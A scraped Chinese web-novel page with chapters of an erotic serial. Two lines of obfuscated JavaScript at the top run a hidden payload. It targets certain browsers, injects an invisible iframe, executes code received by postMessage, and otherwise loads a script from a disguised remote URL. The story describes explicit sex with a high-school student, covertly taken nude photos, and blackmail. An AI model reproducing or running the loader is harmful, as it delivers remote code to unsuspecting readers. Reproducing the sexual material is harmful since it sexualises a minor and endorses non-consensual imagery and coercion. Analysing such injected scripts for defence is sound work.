《深不可测》_宝宝只想和你睡1v1

撩妹情话 撩妹套路 2021-02-22 14:06:38 10 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!薛诺的白色高领羊毛衫质地很好,在她后背轻抚时,可以很容易的摸出胸罩扣的突起。“诺诺,咱们做a吧。”自从吃了邹康年的药,任何一点小小的刺激都会让他兴奋。美少女的脸上微微一红,改成跪坐在男人的双腿上,娇羞无限的在爱人脸上亲吻,“涛哥…疼我…”心,已被很好的抚慰了,现在该轮到身了。青春期的少女,对于心上人的这种要求,是说什么也不会拒绝的。“自己把上衣脱掉吧。”侯龙涛双手隔着紧身的仔裤,在女孩圆圆的小p股上捏揉。薛诺的脸更红了,却没有反对他的提议,直起上身,连同奶白色的衬衣一起从头顶褪下。刚一脱完,就发现侯龙涛正盯着自己包在胸罩中的酥r,美少女“嘤咛”一声,抱住他的脖子,“你看什么嘛?”“呵呵,谁让你发育得这么好,都快成了小波霸了。”男人一点时间也不浪费,已经把女孩的仔裤解开了,正在向下扒着。“涛哥…你坏…咱们进屋吧…”薛诺在这方面还是很传统的,做a一定要在床上。男人轻松的把她抱起来进入卧室,就像她的身子完全没有份量一样。躺在床上,女孩乖巧的抬起双腿,让爱人拉下她的裤子,全身只剩下了黑色带红花绿叶的r罩、内k,和白色的棉袜。侯龙涛脱光了衣服,拉起被子,把两人的身体盖住,揽过少女的皓首吻了起来。越吻越往下,男人的头终于消失在被子里。薛诺躺平了身子,两手扶着他的头顶,闭上双眼,静静的享受爱人对自己身体的怜爱。感到胸罩被推离了茹房,左r被温柔的揉捏,茹头被轻轻的压下再松开,男人嘴里温热的气息从右r尖上传来,快感像电流一样,随着血y在身体中流动。娇嫩的rr被男人下巴上的胡茬刺得痒痒的,迷蒙中的少女不禁娇哼起来,也不知道被窝中的爱人是不是能听到,“唔…涛哥…痒…嗯…痒…”突然间,女孩的喘息变得急促起来,原来是因为有一只大手进入了她的内k中,拨弄着探出头的y核。随着手指c入yd中的动作,侯龙涛的唇舌滑过女孩平坦的小腹,一路向下,吻过她的双腿,一只手为她脱去白袜。薛诺的手已经够不到男人的头了,无所适从的放在身体两侧。小x中的手指抠挖了一阵,还是和对它恋恋不舍的媚r道了别。“不要…别…别拿开…嗯…”还没等少女感到真正的空虚,自己的右手就被拉过去盖住了,左手也被放在了茹房上。当男人的手离开时,她就开始自觉的手y,纤细的手指由于快速的进出y户而沾满了爱y。在薛诺因为兴奋而抬挺臀部时,侯龙涛轻巧的把她的内k褪了下来。又从美少女可爱白嫩的脚丫儿开始向上吻,直到头再次露出被子外,将舌头送进她的檀口中搅动。把女孩的双手从被窝中拉出来,再调整好yj的位置。“唔…唔…”薛诺呼吸困难般的吐出男人的舌头,“不…要…要来了…涛哥…不能停啊…”说着就要再把手放回去,突然间停止了这个企图,因为从下t传来了无比的充实感。侯龙涛开始耸动臀部,粗大的r棒快速在少女娇媚的y唇间抽c,每次顶到zg时,到要在上面温柔的磨转一阵,酸麻得它不住向外放s出喜悦的甘露。c干了一会儿,侯龙涛拉起薛诺的小手,把她的手指放进嘴里吸吮,品尝上面的爱y,“又香又甜,真是爱y中的极品。”听到爱人声音夸张的赞扬,美少女微微睁开朦胧的星眸,发现他正面带微笑、目不转睛的看着自己,不禁大羞。几天前,薛诺出于好奇,将自己手y时的样子拍了下来,事后一看,只觉自己的表情y荡极了。现在男人的yj在x缝中c干的快感不知要比z慰强多少倍,只怕自己的样子不知会有多y荡。“涛…啊…涛哥…别…啊…别看我…嗯…”“为什么?”侯龙涛两肘撑床,双手正好可以在她的头发上抚弄。“好丑…我…我现在一定好丑…啊…嗯…我不要你看…”薛诺扭过头去,紧咬着下唇,看上去有点着急了。“傻宝贝,你现在好漂亮,一点也不丑,不要胡思乱想了。”“真…真的吗?”“真的,不骗你。”薛诺猛的揽住男人的颈项,拼命向上挺着p股,让他c得更深更狠,“涛…涛哥…我…我又要来了…啊…快…”心病一去,快感更甚。“诺诺,你的小x好紧、好热,哥哥舒服死了。”“涛哥…啊…涛哥…我也好美…要了…要了…啊…啊…啊…”就在火热的y精再一次泄出时,耳边响起了男人情意绵绵的声音:“诺诺,我爱你。”“啊…”生活如此的美好,有时美好得让人不敢相信…侯龙涛光着上身,在浴室中刮着胡子,已经穿好衣服的薛诺从后面抱住他,“你刮什么啊?总共也没几根儿。”“嗨,刚才是谁说痒痒的?再说胡子是老得刮的,难道要等成了山羊胡才动手吗?”“山羊胡才显得有学问嘛。”少女把脸颊贴在男人宽厚的背脊上轻轻的磨擦。“诺诺。”“嗯?”“电视柜的抽屉里有一盒新的刀片,我忘了是哪层了,你去帮我找来,好不好?”“好。”在爱人的身上吻了一下,薛诺走了出去。侯龙涛扭头看着她消失在浴室门口的拐角处,嘴角微微向上一翘…第二十七章完金鳞岂是池中物 作者:monkey第二十八章 证据确凿薛诺在最上面的抽屉里找了半天,什么也没找到。拉开第二层,一包新刀片儿就在最外面放着,刀片儿下面是一个没封口的牛皮纸大信封。拿起刀片儿,底下现出了半张照片,照片的另一半在信封里。不经意的瞥了一眼,少女的脸上立刻有红霞出现,那半张照片中是一个平躺在床上的女人赤l的下半身,双腿丰盈修长,ym乌黑浓密。“死涛哥,都有我了,还看这种黄色照片,真是的。”在好奇心的驱使下,薛诺还是把照片从信封中抽了出来,照片中女人的脸庞映入眼帘,女孩儿只觉一阵眩晕,向后退了两步,坐在了床上。那女人睡像甜美,丰r细腰,正是她的母亲何莉萍。薛诺只愣了一下,立刻又起身,把信封中的东西全部倒在床上,一共二十多张,全是何莉萍各种各样的l身睡姿。“这…这…”一时之间,不知是该哭还是该叫。母亲的l照在爱人的卧室中出现,这种震惊非同小可。就在这时,侯龙涛从浴室中走了出来,“诺诺,还没找…”话语嘎然而止,因为看到了少女手中拿着一个大信封,呆立在床前,床上散落着很多自己“藏”起来的照片。“涛哥,这…这是什么?”薛诺扭过头来,眼中并没有愤怒,只有无限的迷惘与不解。侯龙涛赶快过去,抢过信封,将相片又收了起来,“诺诺,你别瞎想,我可以解释的,这些照片不该让你看到的。”“不该让我看到?你什么意思?我在等你的解释呢。”少女的声音在颤抖,眼中已有了泪光,“你怎么…怎么能这样?她是…她是我妈妈啊。”“诺诺,你冷静点,不是你想像的那样。”侯龙涛走到窗前,一手撑着墙面,表情沉重之极,“诺诺,你要相信我,我这全是为了你妈妈好。你真的认为我会无耻到偷拍心爱的女孩儿的母亲的l照的地步吗?你要真这么想,就太伤我心了。”他干得出这种下三滥的事吗?当然干得出,他本来就是个下三滥的小地痞,只不过现在有人代劳了。但薛诺还真不是这么想的,在她眼中,侯龙涛绝对是一个光明磊落的男子汉,一定有什么内情可以解释为什么他会有自己母亲的l照。一看爱人误会了自己的意思,少女更着急了,紧走两步,从后抱住他,“涛哥,我不是这个意思,我不是怀疑你,我…我…”一想到这可能会影响两人的感情,薛诺的眼泪就涌了出来。感到背上一湿,侯龙涛知道功夫做得差不多了。回过身来,把美少女揽在怀中,“诺诺,你是我心爱的姑娘,我绝不会让任何人伤害你们母女的,请你相信我。这件事,我不想让你担心,我一个人扛就是了。”“涛哥,你在说什么啊?什么一个人扛?你忘了吗?你说过的,咱们不是外人,有什么难处,咱们一起分担的。”薛诺的表情很坚定,她本就不信侯龙涛会做对不起自己的事,再听他这么一说,更坚信爱人是有苦衷的。“诺诺…”男人在少女的秀发上抚了抚,眼中充满爱恋,“好,我就什么都不瞒你了。你不是问我为什么不要你妈妈和胡学军好吗?”“是啊,”这才想起来自己今天来的主要目的,“两件事有关系吗?”侯龙涛放开薛诺,从电视柜最下面的抽屉中拿出一盘磁带,放进音响中,“你听完这个就会明白的差不多了,可里面有很难听的话,你确定你要听吗?”“嗯。”少女走过来,按下play键。“龙涛,钱准备好了吗?”不出所料,是胡学军的声音。“先把东西给我。”侯龙涛的声音也出现了。“放心吧,绝对是好货,张张清晰,不比杂志上的差。才要你二十万,既保全了你岳母的名声,又能看美女光p股的照片,一点也不亏。”薛诺脸上一红,知道胡学军说的是自己的母亲。“我不许你这么说她,你这个无赖,她怎么得罪你了,你要这么对她。”侯龙涛愤怒的声音换来美少女对他深情中带着无比感激的眼神。“行了,龙涛,你别跟我来这套了,你看看这些照片,x缝、p眼、茹头都照得清清楚楚。大家都是男人,你别告诉我你不想搞她,这娘们儿c着可好玩了。”“你别把人人都想得跟你一样无耻,废话少说,把底片也给我。”“咱们只说好了买卖照片,你要是连胶卷也要的话,再加五十万吧。”“胡学军,你别太过分。”“过分吗?你想清楚,要是这些照片在网上一发,或是流传在大街上,再附上姓名住址,何莉萍的名气可就大了。‘y荡人母’,哈哈哈,我看她不被那些不懂事的小男人轮j个几次是不会完的,说不定还会捎上你可爱的女朋友呢。”“你这个王八蛋,要是诺诺母女有什么事,我绝不会放过你的。”“你别急着威胁我,只要你老老实实的给钱,我也不会做得太绝的,是不是,女婿,哈哈哈。不管怎么说,我还是要和那娘们儿结婚的,毕竟能有一个那么漂亮的xc,是一件不错的事,她又爱我爱得要死,各取所需,多好。”“你就不怕我跟何阿姨说?”“说?你去说好了,别说她不会相信你,就算她真的信你又怎么样?她会伤心死的,对她有什么好处吗?反正我也快玩儿腻她了,钱也从她身上捞了不少了。如果你什么都不说,我会假装很爱她,让她生活在虚幻的幸福中,你不是存心伤害她吧?“你…你不会有好下场的。”“得了吧,不跟你废话了,照片给你留下,你把钱凑来了,我再给你底片。对了,你要是什么时候想跟你岳母干一炮,也不是没的商量,只要你把薛诺的小嫩x给我c几次就行了,我还没上过十几岁的高中女学生呢,哈哈哈。”侯龙涛把音响关上,“这是我偷偷录下的,本来是想以此为证据,告胡学军敲诈勒索的,可…”话还没说完,薛诺已哭着投进他怀里,“涛哥,对…对不起…”“为什么道歉啊?”“我妈妈她那样对你,我…我…对不起…对不起…”“傻宝宝,没关系的,乖,别哭了。”托起美少女的脸庞,吻了又吻,“底片我已经拿到了,没事了。”“咱们去告那个家伙。”“不行的,就像胡学军说的那样,你妈妈那么爱他,要是让他知道了那个男人只是在玩弄她,她会伤心死的。上次我光是说说,你也看到你妈妈的反应了。”“那…那怎么办?难道就让他这么一直把我妈妈骗下去吗?”“我在想办法,绝不会让他得意下去的。你暂时什么也不要跟你妈妈说,知道吗?”“嗯,我听你的。”在薛诺离开时,侯龙涛要她把照片也带走。说那是证据,万一以后要告胡学军还用得着,所以还不能毁掉,但放在他一个男人这里又不太好。薛诺不但没有理由拒绝,还觉得他想得十分周到…薛诺刚走没多会儿,侯龙涛的手机就响了,“喂。”“涛哥哥,你在干嘛呢?”电话里传出张玉倩嗲声嗲气的声音。三个月以来,两人经常通电话,侯龙涛发挥他死皮赖脸的手段,加上玉倩本就对他极有好感,称呼就越来越亲热,俨然已有了两地分居的情人的架式。“在想你啊。”“去你的,油嘴滑舌的。”“你怎么知道的?是不是偷偷亲过我啊?”“美的你。”“怎么?还不许我美美啊?说真的,等你回来,我一定要好好亲亲你。”“咯咯咯…”玉倩如同银铃般的笑声响起,真是悦耳,“做你的大头梦吧。”“倩妹妹,过年回不回来?我真的想你。”“恐怕不行,我要上winter school,这样明年六月就能毕业了。”“好,我等你。”“涛哥哥…”…何莉萍正在做晚饭,看见女儿进了大门,“诺诺,你上哪去了?”“去涛哥那儿了。”“哼,跟你说了少跟他来往,你就是不听,他这个人可不怎么样。”她还在生侯龙涛的气,一边炒着菜,一边数落着女儿。这回薛诺可不干了,现在侯龙涛在她心里就像神一样,前几天因为不知道内情,母亲说他坏话时,她只能劝几句,多了也不好说。但今时不同往日,突然觉得母亲好不讲理,就像一个泼妇一样。“涛哥他怎么了?他不就是说了胡学军几句坏话嘛,您这不是也算在背后说他的坏话吗?”何莉萍一听女儿顶嘴,居然还直呼自己未婚夫的名字,语气中一点尊重的意思都没有,不禁又是气往上撞,“死丫头,你从哪儿学会顶嘴的?又是侯龙涛那小子教你的吧?”薛诺也生气了,虽然知道母亲是被蒙蔽,但还是忍不住要想到自己是正义的一方,而母亲是站在了邪恶一方。“您不要什么都针对涛哥,他是世界上最好的男人,他做什么都是为了咱们,您不明真相,就不要胡说八道。”“唉呀,死丫头,你这是在教训我了?你才多大,知道什么是好什么是坏?侯龙涛给你喝了什么迷魂汤了,让你胳膊肘向外拐,再这么下去还了得了?我今天明确的告诉你,以后不准你再见他。”“什么?为什么?”少女开始激动了。“你都高二了,还有一年就要高考了,该集中精力学习,没时间谈什么恋爱,更何况是跟侯龙涛那种品行不端的男人。”薛诺气的小脸通红,没想到母亲说出这么不讲理的话。要是自己真的不努力学习也还说得过去,可自己明明在一所区重点高中里,全年级都排在前几名。少女毕竟是少女,激动起来就控制不住自己,把侯龙涛要她保密的话全抛到了脑后。“品行不端的人不是涛哥,而是你的好学军。涛哥他为了维护咱们俩,不知受了多少委屈,你真是狗咬吕d宾,你自己看看吧。”说着就从小背包里掏出一个牛皮纸信封扔在桌上,“我也听了你的好学军用这些敲诈涛哥的录音,涛哥要不是为了你,也不用一次又一次的给胡学军钱了。”薛诺越说越委屈,哭着跑进了自己的房间。何莉萍一愣,对女儿如此反常的举止很不理解,更不明白她说的话。取出信封中的东西一看,“五雷轰顶”是最能形容她现在的感觉了。看照片上的环境,就是自己的卧室,上面还有日期,正是他们两人从黑龙潭玩儿完回来的那天。这才想起,胡学军带着相机,却没在风景区照几张,现在算是明白原因了。良久,何莉萍才回过神儿来,抓起电话就按下了胡学军的手机号,“对不起,您拨叫的用户已停机。”女人本能的感到不妙,却还抱有一丝不切实际的幻想。这一晚,母女二人都没有吃饭…侯龙涛接到薛诺打来的电话,得知她已经把什么都跟她母亲说了。假装吃惊,说了她两句,要她想办法和她母亲和好。挂了电话,都有点不敢相信自己的运气,这么快就达到目的。赶快通知宝丁,要他尽快行动…第二天一早,何莉萍直奔怀柔的解放军装备指挥技术学院,一打听,航太测控工程专业根本没有一个叫胡学军的中校教官,整个学校就没有一个叫胡学军的。又去了自己存钱的银行,虽然已有了一定的心理准备,但当银行的人告诉她她的帐户一天前就被注销了时,何莉萍还是愣在当场,直到排在后面的人不耐烦的催促,她才哭着离开了…薛诺今天不用训练,下午三点多就回到家了,就算在侯龙涛要她跟母亲和好之后,她心里还是有解不开的疙瘩,不准备这么快就原谅母亲。今天早上就是连招呼也没跟母亲打,就上学去了。听到有人用钥匙开门的声音,赶忙坐到餐桌边的一把椅子上,沉下脸,装出一副不高兴的样子。何莉萍走了进来,没跟女儿打招呼,直接往沙发上一坐,一脸的失魂落魄。薛诺沉住气不理她,突然看到母亲失神的双眼中流出了两行清泪。“妈,您怎么了,为什么哭呀?”这种情况下,薛诺没法在气下去了,跑过去跪在母亲的身边,扶住她的腿,轻轻摇着,“妈,昨晚是我不好,您别生我的气,妈…”何莉萍缓缓的扭过头,直勾勾的看着女儿,一会儿之后,好像才意识到她的存在,伸手抚摸着女儿的柔发,“诺诺…”“妈,您别哭了。”少女探起上身,为母亲拭去脸上的泪水。看着女儿清纯甜美的俏脸,何莉萍不禁悲从中来,一把将薛诺紧紧抱住,大哭了起来,“诺诺…呜…是…是妈妈…对不起…对不起你…呜…全是妈妈的错…妈妈对不起你…”接着就把今天的发现说了出来。母女连心,薛诺很能理解母亲现在的心情,可又无能为力,“妈,您别这么说,不是您的错,是胡学军那个混蛋…”说着说着,也是一阵难过,母女二人抱头痛哭起来。就在这时,有人敲门。薛诺站起身来,擦干眼泪,过去开门。何莉萍走进了浴室中,洗了把脸,走出来时,只见有两个员警坐在客厅里,女儿正在为他们倒水。“妈,这是涛哥的朋友李宝丁。丁哥,这就是我妈妈。”薛诺把水放在茶几上。“您好。”宝丁站起来,和何莉萍握了一下手,几个人又分宾主落了坐。“李警官有什么事吗?”“伯母,我和龙涛是老朋友了,您叫我宝丁就行。龙涛他很早就托我帮他调查一个叫胡学军的人,我本来是不该直接来找您,而是该把结果先告诉他。但查出的东西已经超出了我的控制能力之外,我今天是受市局的委托来找您谈的。”何莉萍一听是胡学军的事,又是一阵伤心,可听宝丁的语气,觉得事态还挺严重,只好先忍住了,“胡学军我确实认识,他是我的未婚夫,不知我能怎么帮你们?”“妈,您还叫那个混蛋未婚夫吗?”薛诺生气的说。何莉萍痛苦的看了女儿一眼,又转向宝丁,“宝丁,你有什么就问吧,我已经知道他不是什么好人了。”“事情是这样的,经过我们的调查,发现这个胡学军真名叫胡二狗,山西大同人,跟一个强迫妇女卖y的犯罪团伙来往密切,我们怀疑他就是其中的重要成员之一。”另一个员警接着说:“这个团伙的主要手段就是勾引中年女性,然后拍取l照,以此要胁,敲诈钱财,等那些女人没有了利用价值,就迫她们出卖r体。一旦遇到不听话的,经常是十几、二十个团伙成员一起对她们进行轮j、虐待,手段十分残忍。”何莉萍和薛诺互望一眼,心中都对侯龙涛感激万分。要不是他及时要宝丁进行调查,真不知自己会有什么样的悲惨遭遇。一想到被十几人轮j的画面,那还真不如死了呢。“胡二狗这个人很狡猾,可能是察觉到了我们对他的调查,这几天一直都没有露面。这个案子不是我一个派出所所长能管的,所以我就上报了市局。我们在胡二狗的住处搜出了这些照片。”宝丁说着,从手包中拿出两本相册放在茶几上。何莉萍拿了一本,打开一看,全是中年女人在床上的浪态。胡二狗对他勾引的前几个女人并没有长远的计画,所以都是在做a时突然拿出相机拍照,然后立刻翻脸,索取钱财。在见到何丽萍之前,也是想用这种办法对付她,可一见了,马上就被她的美貌所迷,放弃了敲诈的念头。“市局的同志已经找到照片上的这些受害人了,但她们都因为害怕报复,或是羞于启齿而帮不上太大的忙,其中还有一个已被折磨的精神错乱。因为我和伯母有一层特殊关系,市局就要我和这位刑侦处的同志一起来找您,”指了一下边上的另一个员警,“希望您能提供一些有价值的情况。”何丽萍从两人是怎么认识的说起,当说到两人定情、订婚的过程时,不禁心中一酸,又有眼泪在眼眶中出现。薛诺一看,赶紧接过话茬,把后面的事,包括昨晚和今天的发现告诉了他们。那个被说成是刑侦处的人的员警点了点头,“我明白了,大概是因为胡二狗看你女儿的男朋友更有敲诈的价值,就一直没对你下手。现在由于我们的介入,他不得不潜逃,在临走之前还把你的存款取了出来。”“对了,你的那些l照请交给我们,那些都是证据。”还没等何丽萍母女回答,宝丁抢着说:“那些照片已经毁了,龙涛今早给我打电话,说是已经被伯母一气之下烧掉了。”“是吗?”那个员警又转向何丽萍。“是。”既然宝丁这么说,估计是有用意的,女人也就顺着他的话说了。“那好吧,咱们就谈到这,要是我们能抓到胡二狗,会通知你的。”两个员警站了起来,“我能用一下洗手间吗?”“当然可以。”何丽萍指了指洗手间。等那个员警把门关上了,宝丁小声说:“龙涛跟我说过,不想让警方把您的照片当证据,一旦开庭,怕您的名誉受损。要是再有别人问起,您就说是烧掉了。”“我知道了。”何丽萍现在真的觉得侯龙涛确实是事事都在为自己母女俩着想,心中对他的愧疚更甚…宝丁两人上了警车,另一个员警卸掉了一脸的严肃表情,“李所儿,我表现得还行吧?”“行。你小子算个可造之材,以后好好跟我干,不会亏了你的。”宝丁拍了拍这个刚从警院毕业的小员警的肩膀,以资鼓励…第二十八章完金鳞岂是池中物 作者:monkey第二十九章 巧取豪夺(上) 11/25/2002就在何莉萍失去了半生积蓄的这一天,侯龙涛却收获颇丰。知道薛诺已经把照片给了她母亲,离母女包办的日子也就不远了,心情可以说是好得不得了。到国贸后的第一件事就是把茹嫣叫进办公室里亲热一番,每次他在公司里有这样的要求,这个长腿美媚总是欲拒还迎的。今天也不例外,但在爱人一阵软磨硬泡之后,也就只好顺从了。茹嫣两肘支撑着上身趴在写字台上,双腿稍稍分开站在地上。而侯龙涛坐在转椅上,紧贴在她向后高高撅起的丰满臀部上。把手从淡绿色的职业女装短裙下伸进去,隔着浅r色的裤袜和内k,在y户的部位,用并起的两指力量适中的按揉。“茹嫣,舒服吗?”男人探出头,看着美女闭眼咬唇的撩人模样。正享受着经理温柔抚玩儿的年轻女秘书,以“嗯嗯”的小声娇吟回答了他的问题。侯龙涛又坐正身体,轻轻把女人的短裙捋到小蛮腰上,正如自己先前所想,闪光的裤袜下是一条纯白色的带花边内k。茹嫣最常穿的就是白色的内衣裤,也只有纯白色才能配得上她高洁的个性。男人弯下腰,抓住茹嫣纤细的脚踝,隔着光滑的裤袜,双手小心翼翼的向上抚摸,修长的小腿、丰润的大腿,都是那么完美诱人,最后终于捏住了两片又柔软又有弹性的臀瓣。“嗯…”侯龙涛真是太喜欢这两条曲线鲜明的长腿了,脑中突然出现一句诗的变形:“此物只应天上有,人间哪得几回瞧。”在女人高翘的p股上一阵爱不释手的揉抚后,紧紧的抱住她的大腿,把脸用力的挤向深深的臀沟中。男人拼命的深呼吸着,“茹嫣…嗯…”像是要把美女的r香全都吸进鼻子中,舌头尽量的向外伸出,若有若无的在女人身体最敏感的部位点来点去。那里的裤袜已经湿透了,给予舌头的刺激更是强烈。“啊…哥哥…好…啊…”茹嫣将头埋在双臂之间,发出喜悦的鼻音。比起男人来,女人更是感情的动物,其实侯龙涛的动作并不能给她的r体带来太强的快感,但她却能感到爱人对自己的深深爱恋。正是由于这个原因,茹嫣已是快乐非常。侯龙涛微微抬起头,把身前尤物的p股向中间按压,大口大口的在臀瓣上舔舐,不一会儿就在裤袜上留下了片片口水。“哥哥…哥哥…帮我…帮我脱了吧…”茹嫣难耐的轻摇着美臀,声音也在颤抖。就在男人站起来,双手已经拉住了裤袜的腰口时,敲门的声音响了起来。侯龙涛赶忙府身压住受惊的女人,把手指c进她的小嘴中,在她的耳朵上亲吻,“嘘…没事儿的,不用理他。”完全隔音的办公室,只要屋里的人不开门,从外面是绝对不会知道里面有人的。可这个敲门的人好像很有耐心,足足持续了四、五分钟。“哥哥,也许真的有要紧事儿呢。”茹嫣扭头吻了一下爱人。“嗯…真是不给面子。”侯龙涛极不情愿的站起来,帮美女整理好套装,两人都已没了做a的情绪,硬是打一炮也没什么意思。茹嫣过去把门打开,曲艳走了进来,似笑非笑的看了她一眼,“不好意思,打扰你们了吗?我是真的有事儿。”茹嫣脸上一红,也没回答就低着头出去了。“艳姐,您可真够执着的,非得把门敲开才甘休啊,就不能再等个半小时、一小时的?”侯龙涛已坐回了桌后的大转椅上,撇着嘴,皱着鼻子,一脸的不满。“你也真是的,大白天的,注意一下儿影响,一屋子的同事都看见你把茹嫣叫进来了,我敲那么半天你都不开,就不怕人说闲话?”除了把这个情人的大j巴放进自己身体里,曲艳最大的爱好就是像姐姐一样教训他了。“行行行,是我不好,您大驾何为啊?”侯龙涛耸了耸肩膀。“曲鹏来了,已经在外面等了你二十多分钟了,他说你要再不见他,他就走了。”“哟呵,他还挺那什么的,好像不是咱们求他给钱吧,让他进来。”不一会儿,曲艳领着一个男子进来了,“曲先生,这就是我们侯龙涛经理,你们慢慢谈。”居然要侯龙涛主动,两人才握了握手,“你他妈谱儿够大的。”心中暗骂了一句。看这个曲鹏最多不过三十出头,弄不好连三十都没有,头发用摩丝擦得锃光瓦亮,脸上带着一股傲慢,却绝不是知识份子那种自认清高的骄傲,总之是看了就不舒服。“曲先生,你的申请书上没有注明谁是那个尾气净化装置的发明人,我想不会是你吧?”侯龙涛上下打量着曲鹏,脸上也挂上了傲气。他就是这样,见什么人说什么话,礼尚往来嘛。曲鹏并没有听出侯龙涛的话中带刺儿,明显智商不是很高,“不是我,是我爷爷,曲平,听说过吗?国家环保部的前任部长。我是他的全权代理人,他所有的发明都授权给我了。”侯龙涛还确实听说过曲平这个人,知道他是著名的环保专家,为国家的环保事业做过很大贡献,是很值得尊重的,既然对面的是他的孙子,不禁说起话来也就客气了三分。“你有曲老先生的授权书吗?”“当然有了,还有海淀公证处的公证书、国家专利局的专利证书。”公证书上写的清楚,一共有五项专利授权于曲鹏,授权范围包括投资建厂和专利转让,尾气净化器就是其中的一个。“曲老先生身为环保部的前任部长,在任期间,要想推广这些产品,应该不是很难,怎么会等到现在才委托你来办呢?”侯龙涛这么问,实际上是有不相信曲鹏的意思。曲鹏却眼中一亮,好像遇到了知己一样,向他抱怨起来,“谁说不是呢,唉,我爷爷那老古董,一点经济头脑都没有,一辈子就知道做学问。”语气中一点没有尊重的意思。“虽说环保部的实权不大吧,但他好歹也是一部之长啊,换了别人,早就足捞了。他倒好,几十年全是拿死工资,没沾过公家一点便宜。但凡他要是脑子灵活一点,我这高干子弟也不用大冬天的挤公共汽车来找你了。”“那他为什么又会授权给你呢?”侯龙涛更讨厌这个人了。“别提了,我爷爷是越老越糊涂,七十多岁的老头了,不知享享清福,还是一天到晚的研究这研究那。最近刚生了场大病,傻眼了吧,知道自己斗不过老天了,这才想起找人把这几十